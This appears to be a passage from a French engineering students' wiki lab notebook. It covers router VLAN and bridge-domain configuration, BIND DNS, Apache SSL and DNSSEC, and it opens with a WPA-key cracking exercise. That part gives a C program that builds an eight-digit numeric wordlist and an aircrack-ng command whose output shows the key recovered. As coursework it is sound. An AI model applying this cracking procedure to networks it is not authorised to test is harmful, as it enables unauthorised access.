En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier 000-speedflash.space-ssl.conf afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2modssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35256</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35256"/>
				<updated>2016-11-18T12:37:34Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Travail réalisé la 5ème semaine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM/RAID5&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère semaine ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e semaine (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 3e semaine====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
